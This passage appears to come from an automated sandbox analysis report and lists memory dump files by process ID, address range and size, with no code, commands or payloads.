                                                                                                                                                                                                                                                                                                                • memory/4984-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                • memory/5020-366-0x0000015BB94E0000-0x0000015BB95AF000-memory.dmp
                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                  828KB

                                                                                                                                                                                                                                                                                                                • memory/5020-264-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                • memory/5020-363-0x0000015BB9470000-0x0000015BB94DF000-memory.dmp
                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                  444KB

                                                                                                                                                                                                                                                                                                                • memory/5052-346-0x0000000004FB0000-0x00000000054AE000-memory.dmp
                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                  5.0MB

                                                                                                                                                                                                                                                                                                                • memory/5052-299-0x000000000041905A-mapping.dmp
                                                                                                                                                                                                                                                                                                                • memory/5076-512-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                • memory/5128-506-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                • memory/5128-573-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                • memory/5144-446-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                • memory/5268-451-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                • memory/5316-456-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                • memory/5488-554-0x00007FF6B6664060-mapping.dmp
                                                                                                                                                                                                                                                                                                                • memory/6068-551-0x0000000000000000-mapping.dmp